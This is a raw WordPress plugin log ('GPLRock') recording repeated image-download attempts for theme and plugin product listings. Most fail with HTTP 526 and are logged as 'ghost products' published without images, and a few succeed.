HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:16:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/priority---multipurpose-wordpress-17048.webp for product priority-multipurpose-wordpress after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:16:06 UTC] GPLRock WARNING: Image download failed for product priority-multipurpose-wordpress. URL: https://meldwp.com/wp-content/uploads/priority---multipurpose-wordpress-17048.webp [06-Apr-2026 12:16:06 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: priority-multipurpose-wordpress [06-Apr-2026 12:16:06 UTC] GPLRock: Image download failed for product tilia-photography-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:16:08 UTC] GPLRock: Image download failed for product tilia-photography-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:16:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tilia---photography-portfolio-wordpress-theme-4954.webp for product tilia-photography-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:16:11 UTC] GPLRock: Image download failed for product tilia-photography-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:16:13 UTC] GPLRock: Image download failed for product tilia-photography-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:16:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tilia---photography-portfolio-wordpress-theme-4954.webp for product tilia-photography-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:16:15 UTC] GPLRock WARNING: Image download failed for product tilia-photography-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/tilia---photography-portfolio-wordpress-theme-4954.webp [06-Apr-2026 12:16:15 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: tilia-photography-portfolio-wordpress-theme [06-Apr-2026 12:16:15 UTC] GPLRock: Image download failed for product konado-organic-theme-for-woocommerce-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:16:17 UTC] GPLRock: Image download failed for product konado-organic-theme-for-woocommerce-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:16:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/konado---organic-theme-for-woocommerce-wordpress-4274.webp for product konado-organic-theme-for-woocommerce-wordpress after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:16:19 UTC] GPLRock: Image download failed for product konado-organic-theme-for-woocommerce-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:16:21 UTC] GPLRock: Image download failed for product konado-organic-theme-for-woocommerce-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:16:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/konado---organic-theme-for-woocommerce-wordpress-4274.webp for product konado-organic-theme-for-woocommerce-wordpress after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:16:23 UTC] GPLRock WARNING: Image download failed for product konado-organic-theme-for-woocommerce-wordpress. URL: https://meldwp.com/wp-content/uploads/konado---organic-theme-for-woocommerce-wordpress-4274.webp [06-Apr-2026 12:16:23 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: konado-organic-theme-for-woocommerce-wordpress [06-Apr-2026 12:16:24 UTC] GPLRock: Image download failed for product ekoterra-nonprofit-ecology-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:16:26 UTC] GPLRock: Image download failed for product ekoterra-nonprofit-ecology-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:16:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ekoterra---nonprofit--ecology-theme-23423.webp for product ekoterra-nonprofit-ecology-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:16:28 UTC] GPLRock: Image download failed for product ekoterra-nonprofit-ecology-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:16:30 UTC] GPLRock: Image download failed for product ekoterra-nonprofit-ecology-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:16:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ekoterra---nonprofit--ecology-theme-23423.webp for product ekoterra-nonprofit-ecology-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:16:32 UTC] GPLRock WARNING: Image download failed for product ekoterra-nonprofit-ecology-theme. URL: https://meldwp.com/wp-content/uploads/ekoterra---nonprofit--ecology-theme-23423.webp [06-Apr-2026 12:16:32 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ekoterra-nonprofit-ecology-theme [06-Apr-2026 12:16:32 UTC] GPLRock: Image download failed for product navian-multi-purpose-responsive-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:16:34 UTC] GPLRock: Image download failed for product navian-multi-purpose-responsive-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:16:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/navian---multi-purpose-responsive-wordpress-theme-23231.webp for product navian-multi-purpose-responsive-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:16:37 UTC] GPLRock: Image download failed for product navian-multi-purpose-responsive-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:16:39 UTC] GPLRock: Image download failed for product navian-multi-purpose-responsive-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:16:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/navian---multi-purpose-responsive-wordpress-theme-23231.webp for product navian-multi-purpose-responsive-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:16:41 UTC] GPLRock WARNING: Image download failed for product navian-multi-purpose-responsive-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/navian---multi-purpose-responsive-wordpress-theme-23231.webp [06-Apr-2026 12:16:41 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: navian-multi-purpose-responsive-wordpress-theme [06-Apr-2026 12:16:41 UTC] GPLRock: Image download failed for product volos-one-page-resume-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:16:43 UTC] GPLRock: Image download failed for product volos-one-page-resume-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:16:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/volos---one-page-resume-wordpress-theme-11959.webp for product volos-one-page-resume-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:16:45 UTC] GPLRock: Image download failed for product volos-one-page-resume-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:16:47 UTC] GPLRock: Image download failed for product volos-one-page-resume-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:16:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/volos---one-page-resume-wordpress-theme-11959.webp for product volos-one-page-resume-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:16:49 UTC] GPLRock WARNING: Image download failed for product volos-one-page-resume-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/volos---one-page-resume-wordpress-theme-11959.webp [06-Apr-2026 12:16:49 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: volos-one-page-resume-wordpress-theme [06-Apr-2026 12:17:22 UTC] GPLRock: Image downloaded successfully for product craftis-handcraft-artisan-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2e7917c4.jpg [06-Apr-2026 12:17:22 UTC] GPLRock: Using pre-downloaded image for product craftis-handcraft-artisan-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2e7917c4.jpg [06-Apr-2026 12:17:22 UTC] GPLRock: Ghost product published with image - Product ID: craftis-handcraft-artisan-wordpress-theme [06-Apr-2026 12:17:23 UTC] GPLRock: Image downloaded successfully for product countryholidays-hotel-and-bed-breakfast (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-90cbb354.jpg [06-Apr-2026 12:17:23 UTC] GPLRock: Using pre-downloaded image for product countryholidays-hotel-and-bed-breakfast: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-90cbb354.jpg [06-Apr-2026 12:17:23 UTC] GPLRock: Ghost product published with image - Product ID: countryholidays-hotel-and-bed-breakfast [06-Apr-2026 12:17:25 UTC] GPLRock: Image downloaded successfully for product borrow-loan-company-responsive-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-776a3419.jpg [06-Apr-2026 12:17:25 UTC] GPLRock: Using pre-downloaded image for product borrow-loan-company-responsive-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-776a3419.jpg [06-Apr-2026 12:17:25 UTC] GPLRock: Ghost product published with image - Product ID: borrow-loan-company-responsive-wordpress-theme [06-Apr-2026 12:17:27 UTC] GPLRock: Image downloaded successfully for product dore-jquery-bootstrap-4-admin-template (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f6d8a13c.jpg [06-Apr-2026 12:17:27 UTC] GPLRock: Using pre-downloaded image for product dore-jquery-bootstrap-4-admin-template: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f6d8a13c.jpg [06-Apr-2026 12:17:27 UTC] GPLRock: Ghost product published with image - Product ID: dore-jquery-bootstrap-4-admin-template [06-Apr-2026 12:17:29 UTC] GPLRock: Image downloaded successfully for product zapedah-cycling-club-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-aecaae7a.jpg [06-Apr-2026 12:17:29 UTC] GPLRock: Using pre-downloaded image for product zapedah-cycling-club-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-aecaae7a.jpg [06-Apr-2026 12:17:29 UTC] GPLRock: Ghost product published with image - Product ID: zapedah-cycling-club-wordpress-theme [06-Apr-2026 12:17:31 UTC] GPLRock: Image downloaded successfully for product uadmin-responsive-admin-dashboard-template (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-db5dd6a6.jpg [06-Apr-2026 12:17:31 UTC] GPLRock: Using pre-downloaded image for product uadmin-responsive-admin-dashboard-template: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-db5dd6a6.jpg [06-Apr-2026 12:17:31 UTC] GPLRock: Ghost product published with image - Product ID: uadmin-responsive-admin-dashboard-template [06-Apr-2026 12:17:33 UTC] GPLRock: Image downloaded successfully for product yena-beauty-cosmetic-woocommerce-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-46ff1deb.jpg [06-Apr-2026 12:17:33 UTC] GPLRock: Using pre-downloaded image for product yena-beauty-cosmetic-woocommerce-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-46ff1deb.jpg [06-Apr-2026 12:17:33 UTC] GPLRock: Ghost product published with image - Product ID: yena-beauty-cosmetic-woocommerce-theme [06-Apr-2026 12:17:35 UTC] GPLRock: Image downloaded successfully for product rubik-a-perfect-theme-for-blog-magazine-website (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f7d096a5.jpg [06-Apr-2026 12:17:35 UTC] GPLRock: Using pre-downloaded image for product rubik-a-perfect-theme-for-blog-magazine-website: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f7d096a5.jpg [06-Apr-2026 12:17:35 UTC] GPLRock: Ghost product published with image - Product ID: rubik-a-perfect-theme-for-blog-magazine-website [06-Apr-2026 12:17:36 UTC] GPLRock: Image downloaded successfully for product pithree-construction-building-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f9b78fee.jpg [06-Apr-2026 12:17:36 UTC] GPLRock: Using pre-downloaded image for product pithree-construction-building-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f9b78fee.jpg [06-Apr-2026 12:17:36 UTC] GPLRock: Ghost product published with image - Product ID: pithree-construction-building-wordpress-theme [06-Apr-2026 12:17:38 UTC] GPLRock: Image downloaded successfully for product airtech-plumber-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c08447ad.jpg [06-Apr-2026 12:17:38 UTC] GPLRock: Using pre-downloaded image for product airtech-plumber-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c08447ad.jpg [06-Apr-2026 12:17:38 UTC] GPLRock: Ghost product published with image - Product ID: airtech-plumber-wordpress-theme [06-Apr-2026 12:18:21 UTC] GPLRock: Image download failed for product chit-club-board-games-club-anticafe-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:18:23 UTC] GPLRock: Image download failed for product chit-club-board-games-club-anticafe-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:18:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/chit-club--board-games-club--anticafe-wordpress-theme-29612.webp for product chit-club-board-games-club-anticafe-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:18:25 UTC] GPLRock: Image download failed for product chit-club-board-games-club-anticafe-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:18:27 UTC] GPLRock: Image download failed for product chit-club-board-games-club-anticafe-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:18:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/chit-club--board-games-club--anticafe-wordpress-theme-29612.webp for product chit-club-board-games-club-anticafe-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:18:29 UTC] GPLRock WARNING: Image download failed for product chit-club-board-games-club-anticafe-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/chit-club--board-games-club--anticafe-wordpress-theme-29612.webp [06-Apr-2026 12:18:29 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: chit-club-board-games-club-anticafe-wordpress-theme [06-Apr-2026 12:18:29 UTC] GPLRock: Image download failed for product ratio-material-design-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:18:32 UTC] GPLRock: Image download failed for product ratio-material-design-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:18:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ratio---material-design-wordpress-theme-21201.webp for product ratio-material-design-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:18:34 UTC] GPLRock: Image download failed for product ratio-material-design-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:18:36 UTC] GPLRock: Image download failed for product ratio-material-design-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:18:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ratio---material-design-wordpress-theme-21201.webp for product ratio-material-design-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:18:38 UTC] GPLRock WARNING: Image download failed for product ratio-material-design-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/ratio---material-design-wordpress-theme-21201.webp [06-Apr-2026 12:18:38 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ratio-material-design-wordpress-theme [06-Apr-2026 12:18:38 UTC] GPLRock: Image download failed for product missspa-salon-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:18:40 UTC] GPLRock: Image download failed for product missspa-salon-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:18:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/missspa---salon-wordpress-theme-16354.webp for product missspa-salon-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:18:42 UTC] GPLRock: Image download failed for product missspa-salon-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:18:44 UTC] GPLRock: Image download failed for product missspa-salon-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:18:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/missspa---salon-wordpress-theme-16354.webp for product missspa-salon-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:18:47 UTC] GPLRock WARNING: Image download failed for product missspa-salon-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/missspa---salon-wordpress-theme-16354.webp [06-Apr-2026 12:18:47 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: missspa-salon-wordpress-theme [06-Apr-2026 12:18:47 UTC] GPLRock: Image download failed for product nigiri-restaurant-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:18:49 UTC] GPLRock: Image download failed for product nigiri-restaurant-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:18:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nigiri---restaurant-wordpress-theme-15288.webp for product nigiri-restaurant-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:18:51 UTC] GPLRock: Image download failed for product nigiri-restaurant-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:18:53 UTC] GPLRock: Image download failed for product nigiri-restaurant-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:18:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nigiri---restaurant-wordpress-theme-15288.webp for product nigiri-restaurant-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:18:55 UTC] GPLRock WARNING: Image download failed for product nigiri-restaurant-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/nigiri---restaurant-wordpress-theme-15288.webp [06-Apr-2026 12:18:55 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: nigiri-restaurant-wordpress-theme [06-Apr-2026 12:18:55 UTC] GPLRock: Image download failed for product goshop-multipurpose-ecommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:18:57 UTC] GPLRock: Image download failed for product goshop-multipurpose-ecommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:18:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/goshop---multipurpose-ecommerce-wordpress-theme-3298.webp for product goshop-multipurpose-ecommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:19:00 UTC] GPLRock: Image download failed for product goshop-multipurpose-ecommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:19:02 UTC] GPLRock: Image download failed for product goshop-multipurpose-ecommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:19:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/goshop---multipurpose-ecommerce-wordpress-theme-3298.webp for product goshop-multipurpose-ecommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:19:04 UTC] GPLRock WARNING: Image download failed for product goshop-multipurpose-ecommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/goshop---multipurpose-ecommerce-wordpress-theme-3298.webp [06-Apr-2026 12:19:04 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: goshop-multipurpose-ecommerce-wordpress-theme [06-Apr-2026 12:19:04 UTC] GPLRock: Image downloaded successfully for product giza-creative-resume-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f68e4015.webp [06-Apr-2026 12:19:04 UTC] GPLRock: Using pre-downloaded image for product giza-creative-resume-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f68e4015.webp [06-Apr-2026 12:19:04 UTC] GPLRock: Ghost product published with image - Product ID: giza-creative-resume-wordpress-theme [06-Apr-2026 12:19:04 UTC] GPLRock: Image download failed for product fidalgo-restaurant-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:19:06 UTC] GPLRock: Image download failed for product fidalgo-restaurant-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:19:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fidalgo---restaurant-wordpress-theme-14756.webp for product fidalgo-restaurant-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:19:08 UTC] GPLRock: Image download failed for product fidalgo-restaurant-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:19:11 UTC] GPLRock: Image download failed for product fidalgo-restaurant-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:19:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fidalgo---restaurant-wordpress-theme-14756.webp for product fidalgo-restaurant-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:19:13 UTC] GPLRock WARNING: Image download failed for product fidalgo-restaurant-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/fidalgo---restaurant-wordpress-theme-14756.webp [06-Apr-2026 12:19:13 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: fidalgo-restaurant-wordpress-theme [06-Apr-2026 12:19:13 UTC] GPLRock: Image download failed for product sportbikes-sports-and-fitness-store-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:19:15 UTC] GPLRock: Image download failed for product sportbikes-sports-and-fitness-store-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:19:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sportbikes---sports-and-fitness-store-woocommerce-wordpress-theme-28232.webp for product sportbikes-sports-and-fitness-store-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:19:17 UTC] GPLRock: Image download failed for product sportbikes-sports-and-fitness-store-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:19:19 UTC] GPLRock: Image download failed for product sportbikes-sports-and-fitness-store-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:19:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sportbikes---sports-and-fitness-store-woocommerce-wordpress-theme-28232.webp for product sportbikes-sports-and-fitness-store-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:19:21 UTC] GPLRock WARNING: Image download failed for product sportbikes-sports-and-fitness-store-woocommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/sportbikes---sports-and-fitness-store-woocommerce-wordpress-theme-28232.webp [06-Apr-2026 12:19:21 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: sportbikes-sports-and-fitness-store-woocommerce-wordpress-theme [06-Apr-2026 12:19:21 UTC] GPLRock: Image download failed for product softa-saas-software-webapp-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:19:24 UTC] GPLRock: Image download failed for product softa-saas-software-webapp-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:19:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/softa---saas-software--webapp-wordpress-theme-25646.webp for product softa-saas-software-webapp-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:19:26 UTC] GPLRock: Image download failed for product softa-saas-software-webapp-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:19:28 UTC] GPLRock: Image download failed for product softa-saas-software-webapp-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:19:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/softa---saas-software--webapp-wordpress-theme-25646.webp for product softa-saas-software-webapp-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:19:30 UTC] GPLRock WARNING: Image download failed for product softa-saas-software-webapp-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/softa---saas-software--webapp-wordpress-theme-25646.webp [06-Apr-2026 12:19:30 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: softa-saas-software-webapp-wordpress-theme [06-Apr-2026 12:19:30 UTC] GPLRock: Image download failed for product rigel-multi-purpose-business-portfolio-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:19:32 UTC] GPLRock: Image download failed for product rigel-multi-purpose-business-portfolio-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:19:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/rigel---multi-purpose-business-portfolio-theme-9749.webp for product rigel-multi-purpose-business-portfolio-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:19:34 UTC] GPLRock: Image download failed for product rigel-multi-purpose-business-portfolio-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:19:36 UTC] GPLRock: Image download failed for product rigel-multi-purpose-business-portfolio-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:19:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/rigel---multi-purpose-business-portfolio-theme-9749.webp for product rigel-multi-purpose-business-portfolio-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:19:39 UTC] GPLRock WARNING: Image download failed for product rigel-multi-purpose-business-portfolio-theme. URL: https://meldwp.com/wp-content/uploads/rigel---multi-purpose-business-portfolio-theme-9749.webp [06-Apr-2026 12:19:39 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: rigel-multi-purpose-business-portfolio-theme [06-Apr-2026 12:20:12 UTC] GPLRock: Image download failed for product wp-defender-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:20:14 UTC] GPLRock: Image download failed for product wp-defender-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:20:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wp-defender-wordpress-plugin-30879.webp for product wp-defender-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:20:16 UTC] GPLRock: Image download failed for product wp-defender-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:20:19 UTC] GPLRock: Image download failed for product wp-defender-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:20:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wp-defender-wordpress-plugin-30879.webp for product wp-defender-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:20:21 UTC] GPLRock WARNING: Image download failed for product wp-defender-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/wp-defender-wordpress-plugin-30879.webp [06-Apr-2026 12:20:21 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wp-defender-wordpress-plugin [06-Apr-2026 12:20:21 UTC] GPLRock: Image download failed for product directory-plus-business-directory-php-script (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:20:23 UTC] GPLRock: Image download failed for product directory-plus-business-directory-php-script (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:20:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/directory-plus---business-directory-php-script-7200.webp for product directory-plus-business-directory-php-script after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:20:25 UTC] GPLRock: Image download failed for product directory-plus-business-directory-php-script (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:20:27 UTC] GPLRock: Image download failed for product directory-plus-business-directory-php-script (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:20:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/directory-plus---business-directory-php-script-7200.webp for product directory-plus-business-directory-php-script after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 